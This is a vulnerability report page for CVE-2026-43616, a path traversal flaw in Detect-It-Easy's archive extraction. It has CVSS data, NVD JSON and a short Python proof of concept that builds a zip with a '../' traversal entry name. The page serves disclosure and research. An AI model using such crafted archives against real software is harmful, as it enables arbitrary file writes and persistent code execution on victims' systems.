Security Vulnerability Report
中文
CVE-2026-43616 CVSS 7.1 HIGH

CVE-2026-43616

Published: 2026-05-04 18:16:33
Last Modified: 2026-05-05 19:50:12
Source: [email protected]

Description

Detect-It-Easy prior to 3.21 contains a path traversal vulnerability that allows attackers to write arbitrary files to the filesystem by crafting malicious archive entries with relative traversal sequences or absolute paths. Attackers can exploit insufficient path normalization during archive extraction to write files outside the intended extraction directory and achieve persistent code execution by overwriting user startup scripts.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Detect-It-Easy < 3.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile import os # Create a malicious zip file demonstrating the path traversal # This PoC creates a zip file that attempts to write a file outside the extraction directory def create_malicious_zip(filename): with zipfile.ZipFile(filename, 'w') as zf: # The file name contains '../' to traverse out of the intended directory # In a real attack, this might point to a startup folder or system directory malicious_filename = "../../../../../tmp/poc_exploit.txt" # Write content to the file entry zf.writestr(malicious_filename, "This file was written via Path Traversal vulnerability in CVE-2026-43616.") print(f"Created malicious archive: {filename}") print(f"It contains a file entry named: {malicious_filename}") if __name__ == "__main__": create_malicious_zip("cve_2026_43616_poc.zip")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43616", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:32.830", "lastModified": "2026-05-05T19:50:11.910", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Detect-It-Easy prior to 3.21 contains a path traversal vulnerability that allows attackers to write arbitrary files to the filesystem by crafting malicious archive entries with relative traversal sequences or absolute paths. Attackers can exploit insufficient path normalization during archive extraction to write files outside the intended extraction directory and achieve persistent code execution by overwriting user startup scripts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-23"}]}], "references": [{"url": "https://github.com/horsicq/DIE-engine/commit/7fd300b926daf19707b2a36f0abe8b60a51308ee", "source": "[email protected]"}, {"url": "https://github.com/horsicq/DIE-engine/commit/cbbe1688e58ffd430d284bf65f336973f083db69", "source": "[email protected]"}, {"url": "https://github.com/horsicq/DIE-engine/releases/tag/3.21", "source": "[email protected]"}, {"url": "https://github.com/horsicq/Detect-It-Easy", "source": "[email protected]"}, {"url": "https://github.com/horsicq/Formats/commit/56cdf50ee3c72c56284e2819b23e98332842d259", "source": "[email protected]"}, {"url": "https://github.com/horsicq/XArchive/commit/6a2aa84c2fd120b704f76bb5c5ee3e9b5a7a0fcc", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/detect-it-easy-path-traversal-arbitrary-file-write", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.